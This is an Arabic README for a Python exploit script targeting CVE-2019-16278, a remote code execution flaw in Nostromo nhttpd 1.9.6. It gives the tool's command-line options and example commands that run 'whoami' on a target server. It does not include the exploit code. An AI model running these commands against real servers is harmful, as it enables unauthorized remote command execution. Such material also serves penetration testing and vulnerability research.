
نص بايثون لاستغلال RCE في Nostromo nhttpd <= 1.9.6.
سكريبت بايثون لاستغلال ثغرة RCE في Nostromo nhttpd <= 1.9.6.
usage: CVE-2019-16278.py [-h] [-t TARGET] [-p PORT] [-c COMMAND] [-b BYTES]
Exploit for CVE-2019-16278 - Nostromo 1.9.6 RCE
optional arguments:
-h, --help show this help message and exit
-t TARGET, --target TARGET
المضيف البعيد المستهدف
-p PORT, --port PORT المنفذ البعيد المستهدف
-c COMMAND, --command COMMAND
الأمر المراد تنفيذه على الخادم
-b BYTES, --bytes BYTES
عدد البايتات المطلوب استقبالها في الرد
تشغيل الاستغلال
python CVE-2019-16278.py -t 10.10.10.10. -p 80 -c whoami
تشغيل الاستغلال واستقبال المزيد من البايتات في الرد
python CVE-2019-16278.py -t 10.10.10.10. -p 80 -c whoami -b 4096